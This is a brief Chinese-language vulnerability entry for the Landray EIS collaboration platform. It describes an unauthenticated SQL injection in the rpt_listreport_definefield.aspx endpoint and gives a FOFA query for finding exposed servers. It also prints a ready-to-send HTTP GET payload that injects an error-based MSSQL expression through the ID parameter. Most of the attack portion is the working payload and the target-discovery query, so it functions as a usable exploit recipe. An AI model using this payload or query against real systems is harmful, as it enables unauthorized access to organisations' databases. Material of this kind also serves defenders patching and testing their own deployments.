0x01 产品简介
蓝凌智慧协同平台eis集合了非常丰富的模块,满足组织企业在知识、协同、项目管理系统建设等需求。
0x02 漏洞概述
蓝凌EIS智慧协同平台 rpt_listreport_definefield.aspx 接口存在SQL注入漏洞。未授权的攻击者可以通过该漏洞获取数据库敏感信息。
0x03 测绘语句
fofa:app="Landray-EIS智慧协同平台"
0x04 漏洞复现
payload:GET /SM/rpt_listreport_definefield.aspx?ID=2%20and%201=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271%27))--+ HTTP/1.1